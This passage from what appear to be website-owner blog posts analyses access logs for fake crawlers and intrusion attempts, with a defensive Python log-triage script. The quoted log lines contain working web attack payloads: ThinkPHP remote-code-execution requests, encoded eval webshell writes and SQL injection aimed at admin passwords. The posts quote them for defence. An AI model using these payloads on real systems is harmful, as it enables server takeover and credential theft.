5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%7
5%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
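The Bingbot check from the post above (reverse lookup, look at the hostname suffix) and the injection probes quoted in this post can be handled by one small script. What follows is an added example, not the Python script FreeFixer runs. It parses combined-format access log lines, verifies a crawler claim with forward-confirmed reverse DNS (the PTR name must end in a suffix Microsoft publishes for Bingbot, search.msn.com, or Google publishes for Googlebot, googlebot.com and google.com, and must resolve back to the same address, which goes one step further than the reverse lookup alone), scans the percent-decoded request line for the PHP and SQL indicators seen in the log above, and renders Apache 2.4 Require not ip rules for the addresses that sent a payload. The log lines in the demo are shortened versions of the ones quoted in the posts, the DNS answers are made up, and the resolver functions are injectable so the demo runs offline.

```python
"""Triage combined-format access log lines for fake search-engine crawlers and
injection attempts, then render Apache 2.4 deny rules. Added example, not FreeFixer's
own script; DNS lookups are injectable so the demo runs offline on constructed answers."""
import re
import socket
from collections import defaultdict
from urllib.parse import unquote

# Combined log format; the referer may carry escaped quotes (\"), as in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>[^"]*)"')

# DNS suffixes genuine crawler addresses resolve to, per Microsoft's and
# Google's published verification steps.
CRAWLER_SUFFIXES = {"bingbot": (".search.msn.com",),
                    "googlebot": (".googlebot.com", ".google.com")}

# Indicators drawn from the requests quoted in the posts, matched against the
# percent-decoded request line.
INJECTION_PATTERNS = [
    ("php-code", re.compile(r"\b(?:eval|assert|base64_decode|file_put_contents|fputs|fopen|unlink)\s*\(", re.I)),
    ("php-open-tag", re.compile(r"<\?php", re.I)),
    ("sql-union", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("thinkphp-probe", re.compile(r"think\\(?:template|app)\b", re.I)),
]

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def dns_reverse(ip):
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None

def dns_forward(host):
    try:
        return {ai[4][0] for ai in socket.getaddrinfo(host, None)}
    except OSError:
        return set()

def verify_crawler(ip, crawler, reverse=dns_reverse, forward=dns_forward):
    """Forward-confirmed reverse DNS: the PTR name must carry the crawler's suffix
    AND resolve back to the same address. Returns (genuine, ptr_name)."""
    host = reverse(ip)
    if not host:
        return False, None
    host = host.lower()
    if not host.endswith(CRAWLER_SUFFIXES[crawler]):
        return False, host
    return ip in forward(host), host

def scan_request(request):
    decoded = unquote(request)
    return {name for name, pat in INJECTION_PATTERNS if pat.search(decoded)}

def triage(lines, reverse=dns_reverse, forward=dns_forward):
    """Per-IP summary: fake crawler claim, PTR name, injection indicators, count."""
    report = defaultdict(lambda: {"fake_crawler": False, "rdns": None,
                                  "injection": set(), "requests": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, entry = rec["ip"], report[rec["ip"]]
        entry["requests"] += 1
        entry["injection"] |= scan_request(rec["request"])
        ua = rec["agent"].lower()
        crawler = next((name for name in CRAWLER_SUFFIXES if name in ua), None)
        if crawler:
            genuine, entry["rdns"] = verify_crawler(ip, crawler, reverse, forward)
            entry["fake_crawler"] = not genuine
    return dict(report)

def block_list(report):
    """Block whoever sent an injection payload; a fake crawler that only fetched
    harmless files is left for review, as the post did for 50.116.69.213."""
    return sorted(ip for ip, e in report.items() if e["injection"])

def htaccess_rules(ips):
    body = "".join("    Require not ip %s\n" % ip for ip in ips)
    return "<RequireAll>\n    Require all granted\n" + body + "</RequireAll>\n"

# Constructed demo input: lines adapted and shortened from the posts; DNS answers
# made up to show a wrong PTR suffix and a PTR whose forward lookup does not match.
BOT = '"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"'
SAMPLE_LOG = [
    '50.116.69.213 - - [10/Sep/2019:20:43:53 -0700] "GET /freefixer.xml HTTP/1.1" 200 9808 "-" ' + BOT,
    '124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" ' + BOT,
    '124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f%27]); HTTP/1.1" 200 8204 "-" ' + BOT,
    '203.0.113.9 - - [17/Sep/2019:14:10:00 -0700] "GET //member/login.php/aa%27UNION%20SELECT%201,2%23 HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
]
FAKE_PTR = {"50.116.69.213": "box.example.bluehost.com", "203.0.113.9": "crawl-203-0-113-9.googlebot.com"}
FAKE_A = {"box.example.bluehost.com": {"50.116.69.213"}, "crawl-203-0-113-9.googlebot.com": {"198.51.100.7"}}

def demo():
    return triage(SAMPLE_LOG, reverse=FAKE_PTR.get, forward=lambda h: FAKE_A.get(h, set()))

if __name__ == "__main__":
    result = demo()
    print(result, htaccess_rules(block_list(result)), sep="\n")
```

Run against a real access.log, triage(open("access.log")) uses the system resolver; since the script resolves every line that claims to be a crawler, cache the verify_crawler result per address before pointing it at a large log. The 203.0.113.9 entry in the demo is the case a suffix check alone misses: the PTR name looks right, but the name does not resolve back to the address, so the claim is rejected.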

106.52.197.96 – Hacking Attempt

Recently I’ve been keeping an eye on the traffic at FreeFixer.com and trying to block fake Bing and Google bots and other types of bad behaviour. This morning I found a bunch of hacking attempts from 106.52.197.96, which by the way appears to be located in the Tencent cloud computing (Beijing) Co., Ltd network range. I’m guessing one of Tencent’s cloud clients got hacked.

I’ve posted the requests below. 106.52.197.96 attempts to inject some PHP and SQL code. For obvious reasons, this IP will be blocked in .htaccess.

106.52.197.96 - - [15/Sep/2019:20:00:03 -0700] "PUT //9n2q0m7jOHN7dcr6.txt HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[58B040zuEc1FAlfs]);{//../rss HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "POST //index.php?s=index HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:15 -0700] "GET //d.php HTTP/1.1" 404 419 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //i.php HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:20 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:29 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:37 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:41 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

MegaIndex.ru/2.0 megaindex.com/crawler

While examining the access.log at freefixer.com I found around 1000 hits from a bot named MegaIndex.ru operating from the 144.76.27.118 IP address:

144.76.27.118 - - [03/Sep/2019:23:15:50 -0700] "GET /library/file/hkcmd.exe-188/ HTTP/1.1" 200 19377 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

Unfortunately, MegaIndex.ru’s crawler page does not clearly explain why it is a good idea to let the bot crawl my site. Nor does it clearly explain what User-agent name to use in order to explicitly delay or disallow the bot. In addition to this, it sounds as if the maximum value for Crawl-delay is 5 seconds.

I hope that the 5 seconds max value is just a typo. I’m going to try to slow down or block the bot with the following entries in robots.txt:

User-agent: MegaIndex.ru
Crawl-delay: 3600

or

User-agent: MegaIndex.ru
Disallow: /

I did a reverse IP lookup on 144.76.27.118 and the bot is running at clients.your-server.de.

144.76.27.118 reverse ip lookup

I tried a few geolocation services and all report that the 144.76.27.118 server is located in Germany.

Update 24 hours later: When checking the logs again I noticed that MegaCrawler had done more than 6000 requests. That is unacceptable. I’m blocking 144.76.27.118 in the .htaccess file.

66.249.79.159 – Googlebot/2.1

You can add 66.249.79.159 to your whitelist right away. 66.249.79.159 belongs to Google and the bot operating from there is the real GoogleBot.

If you prefer to verify that 66.249.79.159 belongs to Google, you can launch a command shell and do a reverse IP lookup on 66.249.79.159 and then a forward DNS lookup on the host name returned from the reverse lookup:

As you can see, the reverse lookup returns a .googlebot.com address, and the forward DNS request brings us back to 66.249.79.159. We can now conclude that 66.249.79.159 is a real Googlebot.

For the last few days I’ve been going through all traffic on the Freefixer.com web site. My goal is to reduce the traffic to the web site by blocking a bunch of uninvited bots and crawlers. I’ll try to share some of the results here and I hope you’ll find them useful.

142.252.249.27 is Scanning for Crypto Wallets and Backups

Found a log entry from 142.252.249.27 this morning:

142.252.249.27 - - [09/Sep/2019:07:59:18 -0700] "HEAD /backup.zip HTTP/1.1" 404 4128 "http://www.freefixer.com/backup.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

The bot running at 142.252.249.27 is scanning freefixer.com for backups, databases, data, code, bitcoin wallets, bitcoin cash wallets, litecoin wallets, dogecoin wallets, etc. It looks for various file formats such as .zip, .rar, .dat, .7z, .sql, .mdb, .mdf, .tgz and .tar.gz. Here’s the complete list of requests that 142.252.249.27 did:


Vanta Telecommunications Limited and egihosting.com are the names that show up when I do a lookup in the ARIN registry, as shown in the screenshot below. I’m assuming one of their customers has been hacked.

If you’ve been following this blog for the last week you know that I’ve been trying to weed out fake Bingbots, Yandexbots and Googlebots and other types of bad behaviour. Since 142.252.249.27 is currently trying to gain access to non-public information I’m going to block it in Apache’s .htaccess file.

91.121.209.150 – Apache-HttpClient/4.5.5 (Java/1.8.0_101)

I’m currently following up on some of the most frequent visitors at Freefixer.com. This time it’s 91.121.209.150, with the user agent set to Apache-HttpClient/4.5.5 (Java/1.8.0_101).

Unfortunately this bot does not give any details on why they are crawling Freefixer.com or who is operating the bot. All I know is that it downloads one of the .RSS feeds and then starts downloading all pages that the .RSS feed links to, with a few seconds of delay between requests.

91.121.209.150 - - [07/Sep/2019:16:50:51 -0700] "GET /library/file/295790/ HTTP/1.1" 301 3551 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

91.121.209.150 - - [07/Sep/2019:16:50:52 -0700] "GET /library/file/esrv_svc.exe-295790/ HTTP/1.1" 200 18461 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

91.121.209.150 - - [07/Sep/2019:16:50:56 -0700] "GET /library/file/295789/ HTTP/1.1" 301 559 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/soffice.exe-295789/ HTTP/1.1" 200 18666 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/295788/ HTTP/1.1" 301 562 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

91.121.209.150 - - [07/Sep/2019:16:50:58 -0700] "GET /library/file/QHSafeTray.exe-295788/ HTTP/1.1" 200 25845 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

The reverse IP lookup returns an ovh.net address. OVH is a company that offers web hosting, servers and cloud solutions:

91.121.209.150 appears to be located in France, near the border to Belgium.

207.46.13.179 – bingbot/2.0

Recently I’ve been fixing some performance issues caused by the behaviour of some web bots. If you are concerned about 207.46.13.179, I’ll tell you right away that this is a legitimate Bingbot. Here’s an example from the HTTP access log:

207.46.13.179 - - [04/Sep/2019:21:53:15 -0700] "GET /library/file/mustangser532.exe-206653/ HTTP/1.1" 301 4303 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

